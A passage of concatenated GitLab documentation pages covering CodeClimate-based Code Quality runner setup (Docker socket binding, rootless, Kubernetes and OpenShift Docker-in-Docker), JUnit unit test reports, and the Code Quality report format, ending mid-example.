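    CODECLIMATE_PREFIX: "my-private-registry.local:12345/"
    # Illustrative variable names; define them as protected CI/CD variables.
    CODECLIMATE_REGISTRY_USERNAME: $PRIVATE_REGISTRY_USER
    CODECLIMATE_REGISTRY_PASSWORD: $PRIVATE_REGISTRY_PASSWORD
```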
#### Required images

The following images are required for the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template):

- `codeclimate/codeclimate-structure:latest`
- `codeclimate/codeclimate-csslint:latest`
- `codeclimate/codeclimate-coffeelint:latest`
- `codeclimate/codeclimate-duplication:latest`
- `codeclimate/codeclimate-eslint:latest`
- `codeclimate/codeclimate-fixme:latest`
- `codeclimate/codeclimate-rubocop:rubocop-0-92`

If you are using a custom `.codeclimate.yml` configuration file, you must add the specified plugins in your private container registry.

## Change Runner configuration

CodeClimate runs separate containers for each of its analysis steps. You may need to adjust your Runner configuration so that CodeClimate-based scans can run, or so that they run faster.

### Use private runners

If you have private runners, you should use this configuration for improved performance of Code Quality because:

- Privileged mode is not used.
- Docker-in-Docker is not used.
- Docker images, including all CodeClimate images, are cached, and not re-fetched for subsequent jobs.

This alternative configuration uses socket binding to share the Runner's Docker daemon with the job environment. Before implementing this configuration, consider its [limitations](../docker/using_docker_build.md#use-docker-socket-binding).

To use private runners:

1. Register a new runner:

   ```shell
   $ gitlab-runner register --executor "docker" \
     --docker-image="docker:latest" \
     --url "https://gitlab.com/" \
     --description "cq-sans-dind" \
     --docker-volumes "/cache" \
     --docker-volumes "/builds:/builds" \
     --docker-volumes "/var/run/docker.sock:/var/run/docker.sock" \
     --registration-token="<project_token>" \
     --non-interactive
   ```

1. **Optional, but recommended**: Set the builds directory to `/tmp/builds`, so job artifacts are periodically purged from the runner host.
   If you skip this step, you must clean up the default builds directory (`/builds`) yourself. You can do this by adding the following two flags to `gitlab-runner register` in the previous step.

   ```shell
   --builds-dir "/tmp/builds"
   --docker-volumes "/tmp/builds:/tmp/builds" # Use this instead of --docker-volumes "/builds:/builds"
   ```

   The resulting configuration:

   ```toml
   [[runners]]
     name = "cq-sans-dind"
     url = "https://gitlab.com/"
     token = "<project_token>"
     executor = "docker"
     builds_dir = "/tmp/builds"
     [runners.docker]
       tls_verify = false
       image = "docker:latest"
       privileged = false
       disable_entrypoint_overwrite = false
       oom_kill_disable = false
       disable_cache = false
       volumes = ["/cache", "/var/run/docker.sock:/var/run/docker.sock", "/tmp/builds:/tmp/builds"]
       shm_size = 0
     [runners.cache]
       [runners.cache.s3]
       [runners.cache.gcs]
   ```

1. Apply two overrides to the `code_quality` job created by the template:

   ```yaml
   include:
     - template: Jobs/Code-Quality.gitlab-ci.yml

   code_quality:
     services:            # Shut off Docker-in-Docker
     tags:
       - cq-sans-dind     # Set this job to only run on our new specialized runner
   ```

Code Quality now runs in standard Docker mode.

### Run CodeClimate rootless with private runners

If you are using private runners and want to run Code Quality scans [in rootless Docker mode](https://docs.docker.com/engine/security/rootless/), Code Quality requires some special changes to run properly. You might need a runner dedicated to running only Code Quality jobs, because changes in socket binding may cause problems in other jobs.

To use a rootless private runner:

1. Register a new runner:

   Replace `/run/user/<gitlab-runner-user>/docker.sock` with the path to the local `docker.sock` for the `gitlab-runner` user.
   ```shell
   $ gitlab-runner register --executor "docker" \
     --docker-image="docker:latest" \
     --url "https://gitlab.com/" \
     --description "cq-rootless" \
     --tag-list "cq-rootless" \
     --locked="false" \
     --access-level="not_protected" \
     --docker-volumes "/cache" \
     --docker-volumes "/tmp/builds:/tmp/builds" \
     --docker-volumes "/run/user/<gitlab-runner-user>/docker.sock:/run/user/<gitlab-runner-user>/docker.sock" \
     --token "<project_token>" \
     --non-interactive \
     --builds-dir "/tmp/builds" \
     --env "DOCKER_HOST=unix:///run/user/<gitlab-runner-user>/docker.sock" \
     --docker-host "unix:///run/user/<gitlab-runner-user>/docker.sock"
   ```

   The resulting configuration:

   ```toml
   [[runners]]
     name = "cq-rootless"
     url = "https://gitlab.com/"
     token = "<project_token>"
     executor = "docker"
     builds_dir = "/tmp/builds"
     environment = ["DOCKER_HOST=unix:///run/user/<gitlab-runner-user>/docker.sock"]
     [runners.docker]
       tls_verify = false
       image = "docker:latest"
       privileged = false
       disable_entrypoint_overwrite = false
       oom_kill_disable = false
       disable_cache = false
       volumes = ["/cache", "/run/user/<gitlab-runner-user>/docker.sock:/run/user/<gitlab-runner-user>/docker.sock", "/tmp/builds:/tmp/builds"]
       shm_size = 0
       host = "unix:///run/user/<gitlab-runner-user>/docker.sock"
     [runners.cache]
       [runners.cache.s3]
       [runners.cache.gcs]
   ```

1. Apply the following overrides to the `code_quality` job created by the template:

   ```yaml
   code_quality:
     services:
     variables:
       DOCKER_SOCKET_PATH: /run/user/997/docker.sock
     tags:
       - cq-rootless
   ```

Code Quality now runs in standard Docker mode and rootless.

The same configuration is required if your goal is to [use rootless Podman to run Docker](https://docs.gitlab.com/runner/executors/docker.html#use-podman-to-run-docker-commands) with Code Quality. Make sure to replace `/run/user/<gitlab-runner-user>/docker.sock` with the correct `podman.sock` path in your system, for example: `/run/user/<gitlab-runner-user>/podman/podman.sock`.
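The numeric `997` in `DOCKER_SOCKET_PATH` is the UID of the `gitlab-runner` user on the host, so it varies between systems. A quick way to derive the socket path, as a sketch assuming the rootless daemon publishes its socket under `XDG_RUNTIME_DIR` (the systemd default is `/run/user/<uid>`):

```shell
# Run as the gitlab-runner user. Prints the UID and the expected
# rootless Docker socket path, falling back to /run/user/<uid>
# when XDG_RUNTIME_DIR is unset.
uid="$(id -u)"
echo "UID: $uid"
echo "${XDG_RUNTIME_DIR:-/run/user/$uid}/docker.sock"
```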
### Configure Kubernetes or OpenShift runners

You must set up Docker in a Docker container (Docker-in-Docker) to use Code Quality. The Kubernetes executor [supports Docker-in-Docker](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind).

To ensure Code Quality jobs can run on a Kubernetes executor:

- If you're using TLS to communicate with the Docker daemon, the executor [must be running in privileged mode](https://docs.gitlab.com/runner/executors/kubernetes/#other-configtoml-settings). Additionally, the certificate directory must be [specified as a volume mount](../docker/using_docker_build.md#docker-in-docker-with-tls-enabled-in-kubernetes).
- It is possible that the DinD service doesn't start up fully before the Code Quality job starts. This is a limitation documented in [Troubleshooting the Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/troubleshooting.html#docker-cannot-connect-to-the-docker-daemon-at-tcpdocker2375-is-the-docker-daemon-running). To resolve the issue, use `before_script` to wait for the Docker daemon to fully boot up. For an example, see the configuration in the `.gitlab-ci.yml` file described in the following section.

#### Kubernetes

To run Code Quality in Kubernetes:

- The Docker-in-Docker service must be added as a service container in the `config.toml` file.
- The Docker daemon in the service container must listen on a TCP and UNIX socket, as both sockets are required by Code Quality.
- The Docker socket must be shared with a volume.

Due to a [Docker requirement](https://docs.docker.com/reference/cli/docker/container/run/#privileged), the privileged flag must be enabled for the service container.
```toml
[runners.kubernetes]
  [runners.kubernetes.service_container_security_context]
    privileged = true
    allow_privilege_escalation = true
  [runners.kubernetes.volumes]
    [[runners.kubernetes.volumes.empty_dir]]
      mount_path = "/var/run/"
      name = "docker-sock"
  [[runners.kubernetes.services]]
    alias = "dind"
    command = [
      "--host=tcp://0.0.0.0:2375",
      "--host=unix://var/run/docker.sock",
      "--storage-driver=overlay2"
    ]
    entrypoint = ["dockerd"]
    name = "docker:20.10.12-dind"
```

{{< alert type="note" >}}

If you use the [GitLab Runner Helm Chart](https://docs.gitlab.com/runner/install/kubernetes.html), you can use the previous Kubernetes configuration in the [`config` field](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html) of the `values.yaml` file.

{{< /alert >}}

To ensure that you use the `overlay2` [storage driver](https://docs.docker.com/storage/storagedriver/select-storage-driver/), which offers the best overall performance:

- Specify the `DOCKER_HOST` that the Docker CLI communicates with.
- Set the `DOCKER_DRIVER` variable to empty.

Use the `before_script` section to wait for the Docker daemon to fully boot up. Since GitLab Runner v16.9, you can instead [set the `HEALTHCHECK_TCP_PORT` variable](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services).

```yaml
include:
  - template: Code-Quality.gitlab-ci.yml

code_quality:
  services: []
  variables:
    DOCKER_HOST: tcp://dind:2375
    DOCKER_DRIVER: ""
  before_script:
    - while ! docker info > /dev/null 2>&1; do sleep 1; done
```

#### OpenShift

For OpenShift, you should use the [GitLab Runner Operator](https://docs.gitlab.com/runner/install/operator.html).

To give the Docker daemon in the service container permissions to initialize its storage, you must mount the `/var/lib` directory as a volume mount.

{{< alert type="note" >}}

If you cannot mount the `/var/lib` directory as a volume mount, you can set `--storage-driver` to `vfs` instead.
If you opt for the `vfs` value, it might have a negative impact on [performance](https://docs.docker.com/storage/storagedriver/select-storage-driver/).

{{< /alert >}}

To configure permissions for the Docker daemon:

1. Create a `config.toml` file with this configuration template to customize the runner's configuration:

   ```toml
   [[runners]]
     [runners.kubernetes]
       [runners.kubernetes.service_container_security_context]
         privileged = true
         allow_privilege_escalation = true
       [runners.kubernetes.volumes]
         [[runners.kubernetes.volumes.empty_dir]]
           mount_path = "/var/run/"
           name = "docker-sock"
         [[runners.kubernetes.volumes.empty_dir]]
           mount_path = "/var/lib/"
           name = "docker-data"
       [[runners.kubernetes.services]]
         alias = "dind"
         command = [
           "--host=tcp://0.0.0.0:2375",
           "--host=unix://var/run/docker.sock",
           "--storage-driver=overlay2"
         ]
         entrypoint = ["dockerd"]
         name = "docker:20.10.12-dind"
   ```

1. [Set the custom configuration to your runner](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#customize-configtoml-with-a-configuration-template).
1. Optional. Attach a [`privileged` service account](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html) to the build Pod. This depends on your OpenShift cluster setup:

   ```shell
   oc create sa dind-sa
   oc adm policy add-scc-to-user anyuid -z dind-sa
   oc adm policy add-scc-to-user -z dind-sa privileged
   ```

1. Set the permissions in the [`[runners.kubernetes]` section](https://docs.gitlab.com/runner/executors/kubernetes/#other-configtoml-settings).
1. The job definition stays the same as in the Kubernetes case:

   ```yaml
   include:
     - template: Code-Quality.gitlab-ci.yml

   code_quality:
     services: []
     variables:
       DOCKER_HOST: tcp://dind:2375
       DOCKER_DRIVER: ""
     before_script:
       - while ! docker info > /dev/null 2>&1; do sleep 1; done
   ```

#### Volumes and Docker storage

Docker stores all of its data in the `/var/lib` volume, which can become large.
To reuse Docker-in-Docker storage across the cluster, you can use [Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/) as an alternative.

<!--- end_remove -->
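If you take the Persistent Volume route, the Kubernetes executor can mount a PersistentVolumeClaim in place of the `empty_dir` used for `/var/lib` earlier. A minimal sketch, assuming a claim named `docker-data-pvc` already exists in the runner's namespace (the claim name is illustrative, not a GitLab default):

```toml
[runners.kubernetes]
  [runners.kubernetes.volumes]
    # Mount a PVC for Docker's storage directory so image layers and
    # build cache persist across jobs. The claim name is an example.
    [[runners.kubernetes.volumes.pvc]]
      name = "docker-data-pvc"
      mount_path = "/var/lib/"
```

Keep the `docker-sock` `empty_dir` from the earlier configuration; only the storage volume changes.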
https://docs.gitlab.com/ci/unit_test_reports
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/unit_test_reports.md
2025-08-13
doc/ci/testing
unit_test_reports.md
Verify
Pipeline Execution
Unit test reports
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Unit test reports display test results directly in merge requests and pipeline details, so you can identify failures without searching through job logs.

Use unit test reports when you want to:

- See test failures immediately in merge requests.
- Compare test results between branches.
- Debug failing tests with error details and screenshots.
- Track test failure patterns over time.

Unit test reports require the JUnit XML format and do not affect job status. To make a job fail when tests fail, your job's [script](../yaml/_index.md#script) must exit with a non-zero status.

GitLab Runner uploads your test results in JUnit XML format as [artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit). When you go to a merge request, your test results are compared between the source branch (head) and target branch (base) to show what changed.

## File format and size limits

Unit test reports must use JUnit XML format with specific requirements to ensure proper parsing and display.

### File requirements

Your test report files must:

- Use JUnit XML format with `.xml` file extension.
- Be smaller than 30 MB per individual file.
- Have a total size under 100 MB for all JUnit files in a job.

If you have duplicate test names, only the first test is used and others with the same name are ignored. For test case limits, see [Maximum test cases per unit test report](../../user/gitlab_com/_index.md#cicd).
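You can check the per-file limit before uploading a report. The following shell sketch is illustrative only (the helper name and report path are made up, not part of GitLab):

```shell
# Illustrative helper, not a GitLab feature: fail early if a JUnit file
# exceeds the 30 MB per-file limit documented on this page.
check_junit_size() {
  file="$1"
  max=$((30 * 1024 * 1024))   # 30 MB in bytes
  size=$(wc -c < "$file")
  if [ "$size" -gt "$max" ]; then
    echo "too large: $file ($size bytes)"
    return 1
  fi
  echo "ok: $file"
}
```

Call it from your job's `script` before the job ends, for example `check_junit_size rspec.xml`.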
### JUnit XML format specification

GitLab parses the following elements and attributes from your JUnit XML files:

| XML Element  | XML Attribute   | Description |
| ------------ | --------------- | ----------- |
| `testsuite`  | `name`          | Test suite name (parsed but not displayed in UI) |
| `testcase`   | `classname`     | Test class or category name (used as the suite name) |
| `testcase`   | `name`          | Individual test name |
| `testcase`   | `file`          | File path where the test is defined |
| `testcase`   | `time`          | Test execution time in seconds |
| `failure`    | Element content | Failure message and stack trace |
| `error`      | Element content | Error message and stack trace |
| `skipped`    | Element content | Reason for skipping the test |
| `system-out` | Element content | System output and attachment tags (only parsed from `testcase` elements) |
| `system-err` | Element content | System error output (only parsed from `testcase` elements) |

{{< alert type="note" >}}

The `testcase classname` attribute is used as the suite name, not the `testsuite name` attribute.
{{< /alert >}}

#### XML structure example

```xml
<testsuites>
  <testsuite name="Authentication Tests" tests="1" failures="1">
    <testcase classname="LoginTest" name="test_invalid_password" file="spec/auth_spec.rb" time="0.23">
      <failure>Expected authentication to fail</failure>
      <system-out>[[ATTACHMENT|screenshots/failure.png]]</system-out>
    </testcase>
  </testsuite>
</testsuites>
```

This XML displays in GitLab as:

- Suite: `LoginTest` (from `testcase classname`)
- Name: `test_invalid_password` (from `testcase name`)
- File: `spec/auth_spec.rb` (from `testcase file`)
- Time: `0.23s` (from `testcase time`)
- Screenshot: Available in test details dialog (from `testcase system-out`)
- Not displayed: "Authentication Tests" (from `testsuite name`)

## Test result types

Test results are compared between the merge request's source and target branches to show what changed:

- Newly failed tests: Tests that passed on the target branch but failed on your branch.
- Newly encountered errors: Tests that passed on the target branch but had errors on your branch.
- Existing failures: Tests that failed on both branches.
- Resolved failures: Tests that failed on the target branch but passed on your branch.

If branches cannot be compared, for example when there is no target branch data yet, only the failed tests from your branch are shown.

For tests that failed in the default branch in the last 14 days, you see a message like `Failed {n} time(s) in {default_branch} in the last 14 days`. This count includes failed tests from completed pipelines, but not [blocked pipelines](../jobs/job_control.md#types-of-manual-jobs). Support for blocked pipelines is proposed in [issue 431265](https://gitlab.com/gitlab-org/gitlab/-/issues/431265).

## Configure unit test reports

Configure unit test reports to display test results in merge requests and pipelines.

To configure unit test reports:

1. Configure your test job to output JUnit XML format test reports.
   For configuration details, review your testing framework's documentation.

1. In your `.gitlab-ci.yml` file, add [`artifacts:reports:junit`](../yaml/artifacts_reports.md#artifactsreportsjunit) to your test job.
1. Specify the path to your XML test report files.
1. Optional. To make report files browsable, include them with [`artifacts:paths`](../yaml/_index.md#artifactspaths).
1. Optional. To upload reports even when jobs fail, use [`artifacts:when:always`](../yaml/_index.md#artifactswhen).

Example configuration for Ruby with RSpec:

```yaml
ruby:
  stage: test
  script:
    - bundle install
    - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml
  artifacts:
    when: always
    paths:
      - rspec.xml
    reports:
      junit: rspec.xml
```

You can view test results:

- In the **Tests** tab of pipeline details after your test job completes.
- In the **Test summary** panel of merge requests after your pipeline completes.

## View test results in merge requests

View detailed information about test failures in merge requests.

The **Test summary** panel shows an overview of your test results, including how many tests failed and passed.

![Expanded Test summary panel that shows one failed test with the View details link](img/test_summary_panel_expanded_v18_1.png)

To view test failure details:

1. In a merge request, go to the **Test summary** panel.
1. To expand the **Test summary** panel, select **Show details** ({{< icon name="chevron-lg-down" >}}).
1. Select **View details** next to a failed test.

   The dialog displays the test name, file path, execution time, screenshot attachment (if configured), and error output.

To view all test results:

- From the **Test summary** panel, select **Full report** to go to the **Tests** tab in the pipeline details.

### Copy failed test names

Copy test names to rerun them locally for debugging.

Prerequisites:

- Your JUnit report must include `<file>` attributes for failed tests.
To copy all failed test names:

- From the **Test summary** panel, select **Copy failed tests** ({{< icon name="copy-to-clipboard" >}}).

  The failed tests are copied as a space-separated string.

To copy a single failed test name:

1. To expand the **Test summary** panel, select **Show details** ({{< icon name="chevron-lg-down" >}}).
1. Select **View details** next to the test you want to copy.
1. In the dialog, select **Copy test name to rerun locally** ({{< icon name="copy-to-clipboard" >}}).

   The test name is copied to your clipboard.

## View test results in pipelines

View all test suites and cases in pipeline details.

To view pipeline test results:

1. Go to your pipeline details page.
1. Select the **Tests** tab.
1. Select any test suite to see individual test cases.

![Test results showing 1671 tests with 1 minute 11 seconds total execution time and individual job execution times.](img/pipelines_junit_test_report_v18_3.png)

You can also retrieve test reports with the [Pipelines API](../../api/pipelines.md#get-a-test-report-for-a-pipeline).

### Test timing metrics

Test results display different timing metrics:

Pipeline duration
: Elapsed time from when the pipeline starts until it completes.

Test execution time
: Total time spent running all tests across all jobs, added together.

Queue time
: Time jobs spent waiting for available runners.

When jobs run in parallel, cumulative test execution time can exceed pipeline duration. Pipeline duration shows how long you wait for results, while test execution time shows compute resources used.

For example, a pipeline that completes in 81 minutes might show 9 hours 10 minutes of test execution time if many test jobs run in parallel across multiple runners.

## Add screenshots to test reports

Add screenshots to test reports to help debug test failures.

To add screenshots to test reports:

1. In your JUnit XML file, add attachment tags with screenshot paths relative to `$CI_PROJECT_DIR`:

   ```xml
   <testcase time="1.00" name="Test">
     <system-out>[[ATTACHMENT|/path/to/some/file]]</system-out>
   </testcase>
   ```

1. In your `.gitlab-ci.yml` file, configure your job to upload screenshots as artifacts:

   - Specify the path to your screenshot files.
   - Optional. Use [`artifacts:when: always`](../yaml/_index.md#artifactswhen) to upload screenshots when tests fail.

   For example:

   ```yaml
   ruby:
     stage: test
     script:
       - bundle install
       - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml
       # Your test framework should save screenshots to a directory
     artifacts:
       when: always
       paths:
         - rspec.xml
         - screenshots/
       reports:
         junit: rspec.xml
   ```

1. Run your pipeline.

You can access the screenshot link in the test details dialog when you select **View details** for a failed test in the **Test summary** panel.

![A failed unit test report with test details and screenshot attachment](img/unit_test_report_screenshot_v18_1.png)

## Troubleshooting

### Test report appears empty

You might see an empty **Test summary** panel in merge requests.

This issue occurs when:

- Report artifacts have expired.
- JUnit files exceed size limits.

To resolve this issue, set a longer [`expire_in`](../yaml/_index.md#artifactsexpire_in) value for the report artifact, or run a new pipeline to generate a new report.

If JUnit files exceed size limits, ensure:

- Individual JUnit files are less than 30 MB.
- The total size of all JUnit files for the job is less than 100 MB.

Support for custom limits is proposed in [epic 16374](https://gitlab.com/groups/gitlab-org/-/epics/16374).

### Test results are missing

You might see fewer test results than expected in your reports. This can happen when you have duplicate test names in your JUnit XML file. Only the first test for each name is used and duplicates are ignored.

To resolve this issue, ensure all test names and classes are unique.
### No test reports appear in merge requests

You might not see the **Test summary** panel at all in merge requests. This issue can happen when the target branch has no test data for comparison.

To resolve this issue, run a pipeline on your target branch to generate baseline test data.

### JUnit XML parsing errors

You might see parsing error indicators next to job names in your pipeline. This can happen when JUnit XML files contain formatting errors or invalid elements.

To resolve this issue:

- Verify your JUnit XML files follow the standard format.
- Check that all XML elements are properly closed.
- Ensure attribute names and values are correctly formatted.

For [grouped jobs](../jobs/_index.md#group-similar-jobs-together-in-pipeline-views), only the first parsing error from the group is displayed.
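One way to catch malformed reports before they reach GitLab is to validate them in the job itself. The following shell sketch is an illustrative pre-flight check, assuming `python3` is available on the runner image (the function name is made up):

```shell
# Illustrative pre-flight check, not a GitLab feature: report whether a
# JUnit file is well-formed XML before uploading it as an artifact.
# Assumes python3 is available on the runner image.
validate_junit() {
  if python3 -c 'import sys, xml.etree.ElementTree as ET; ET.parse(sys.argv[1])' "$1" 2>/dev/null; then
    echo "valid: $1"
  else
    echo "invalid: $1"
  fi
}
```

Run it as a final `script` step, for example `validate_junit rspec.xml`, so a broken report fails fast with a clear message instead of a parsing error indicator in the pipeline.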
https://docs.gitlab.com/ci/code_quality
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/code_quality.md
2025-08-13
doc/ci/testing
code_quality.md
Application Security Testing
Static Analysis
Code Quality
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Code Quality identifies maintainability issues before they become technical debt. The automated feedback that occurs during code reviews can help your team write better code. The findings appear directly in merge requests, making problems visible when they're most cost-effective to fix.

Code Quality works with multiple programming languages and integrates with common linters, style checkers, and complexity analyzers. Your existing tools can feed into the Code Quality workflow, preserving your team's preferences while standardizing how results are displayed.

## Features per tier

Different features are available in different [GitLab tiers](https://about.gitlab.com/pricing/), as shown in the following table:

| Feature | In Free | In Premium | In Ultimate |
|:--------|:--------|:-----------|:------------|
| [Import Code Quality results from CI/CD jobs](#import-code-quality-results-from-a-cicd-job) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes |
| [Use CodeClimate-based scanning](#use-the-built-in-code-quality-cicd-template-deprecated) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes |
| [See findings in a merge request widget](#merge-request-widget) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes |
| [See findings in a pipeline report](#pipeline-details-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes |
| [See findings in the merge request changes view](#merge-request-changes-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes |
| [Analyze overall health in a project quality summary view](#project-quality-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes |

## Scan code for quality violations

Code Quality is an open system that supports importing results from many scanning tools. To find violations and surface them, you can:

- Directly use a scanning tool and [import its results](#import-code-quality-results-from-a-cicd-job). _(Preferred.)_
- [Use a built-in CI/CD template](#use-the-built-in-code-quality-cicd-template-deprecated) to enable scanning. The template uses the CodeClimate engine, which wraps common open source tools. _(Deprecated.)_

You can capture results from multiple tools in a single pipeline. For example, you can run a code linter to scan your code along with a language linter to scan your documentation, or you can use a standalone tool along with CodeClimate-based scanning. Code Quality combines all of the reports so you see all of them when you [view results](#view-code-quality-results).

### Import Code Quality results from a CI/CD job

Many development teams already use linters, style checkers, or other tools in their CI/CD pipelines to automatically detect violations of coding standards. You can make the findings from these tools easier to see and fix by integrating them with Code Quality.

To see if your tool already has a documented integration, see [Integrate common tools with Code Quality](#integrate-common-tools-with-code-quality).

To integrate a different tool with Code Quality:

1. Add the tool to your CI/CD pipeline.
1. Configure the tool to output a report as a file.
   - This file must use a [specific JSON format](#code-quality-report-format).
   - Many tools support this output format natively. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name.
   - Other tools can sometimes create JSON output using a custom JSON format or template. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality.
1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that matches this file.

Now, after the pipeline runs, the quality tool's results are [processed and displayed](#view-code-quality-results).

### Use the built-in Code Quality CI/CD template (deprecated)

{{< alert type="warning" >}}

This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](#import-code-quality-results-from-a-cicd-job) instead.

{{< /alert >}}

Code Quality also includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine.

The CodeClimate engine runs:

- Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability).
- A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code.

For more details, see [Configure CodeClimate-based Code Quality scanning](code_quality_codeclimate_scanning.md).

#### Migrate from CodeClimate-based scanning

The CodeClimate engine uses a customizable set of [analysis plugins](code_quality_codeclimate_scanning.md#configure-codeclimate-analysis-plugins). Some are on by default; others must be explicitly enabled.
The following integrations are available to replace the built-in plugins:

| Plugin       | On by default | Replacement |
|--------------|------------------------------------------------------------|-------------|
| Duplication  | {{< icon name="check-circle" >}} Yes | [Integrate PMD Copy/Paste Detector](#pmd-copypaste-detector). |
| ESLint       | {{< icon name="check-circle" >}} Yes | [Integrate ESLint](#eslint). |
| gofmt        | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable the [gofmt linter](https://golangci-lint.run/usage/linters#gofmt). |
| golint       | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable one of the included linters that replaces golint. golint is [deprecated and frozen](https://github.com/golang/go/issues/38968). |
| govet        | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint). golangci-lint [includes govet by default](https://golangci-lint.run/usage/linters#enabled-by-default). |
| markdownlint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate markdownlint-cli2](#markdownlint-cli2). |
| pep8         | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). |
| RuboCop      | {{< icon name="check-circle" >}} Yes | [Integrate RuboCop](#rubocop). |
| SonarPython  | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). |
| Stylelint    | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate Stylelint](#stylelint). |
| SwiftLint    | {{< icon name="dotted-circle" >}} No | [Integrate SwiftLint](#swiftlint). |

## View Code Quality results

Code Quality results are shown in the:

- [Merge request widget](#merge-request-widget)
- [Merge request changes view](#merge-request-changes-view)
- [Pipeline details view](#pipeline-details-view)
- [Project quality view](#project-quality-view)

### Merge request widget

Code Quality analysis results display in the merge request widget area if a report from the target branch is available for comparison. The merge request widget displays Code Quality findings and resolutions that were introduced by the changes made in the merge request. Multiple Code Quality findings with identical fingerprints display as a single entry in the merge request widget. Each individual finding is listed in the full report in the **Pipeline** details view.

![List of code quality issues in the merge request, ordered by decreasing severity](img/code_quality_merge_request_widget_v18_2.png)

### Merge request changes view

{{< details >}}

- Tier: Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Code Quality results display in the merge request **Changes** view. Lines containing Code Quality issues are marked by a symbol beside the gutter. Select the symbol to see the list of issues, then select an issue to see its details.

![Lines in a merge request's changes tab marked with a symbol to indicate code quality issues](img/code_quality_changes_view_v18_2.png)

### Pipeline details view

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

The full list of Code Quality violations generated by a pipeline is shown in the **Code Quality** tab of the pipeline's details page. The pipeline details view displays all Code Quality findings that were found on the branch it was run on.
![List of all issues in the branch, ordered by decreasing severity](img/code_quality_pipeline_details_view_v18_2.png)

### Project quality view

{{< details >}}

- Tier: Ultimate
- Offering: GitLab.com, GitLab Self-Managed
- Status: Beta

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/72724) in GitLab 14.5 [with a flag](../../administration/feature_flags/_index.md) named `project_quality_summary_page`. This feature is in [beta](../../policy/development_stages_support.md). Disabled by default.

{{< /history >}}

The project quality view displays an overview of the code quality findings. The view is available under **Analyze > CI/CD analytics**, and requires the [`project_quality_summary_page`](../../administration/feature_flags/_index.md) feature flag to be enabled for the project.

![Total number of issues, called violations, followed by the number of issues of each severity](img/code_quality_summary_v15_9.png)

## Code Quality report format

You can [import Code Quality results](#import-code-quality-results-from-a-cicd-job) from any tool that can output a report in the following format. This format is a version of the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) that includes a smaller number of fields.

The file you provide as [Code Quality report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) must contain a single JSON array. Each object in that array must have at least the following properties:

| Name | Type | Description |
|-----------------------------------------------------------|---------|-------------|
| `description` | String | A human-readable description of the code quality violation. |
| `check_name` | String | A unique name representing the check, or rule, associated with this violation. |
| `fingerprint` | String | A unique fingerprint to identify this specific code quality violation, such as a hash of its contents. |
| `location.path` | String | The file containing the code quality violation, expressed as a relative path in the repository. Do not prefix with `./`. |
| `location.lines.begin` or `location.positions.begin.line` | Integer | The line on which the code quality violation occurred. |
| `severity` | String | The severity of the violation. Can be one of `info`, `minor`, `major`, `critical`, or `blocker`. |

The format is different from the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) in the following ways:

- Although the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) supports more properties, Code Quality only processes the fields listed previously.
- The GitLab parser does not allow a [byte order mark](https://en.wikipedia.org/wiki/Byte_order_mark) at the beginning of the file.

For example, this is a compliant report:

```json
[
  {
    "description": "'unused' is assigned a value but never used.",
    "check_name": "no-unused-vars",
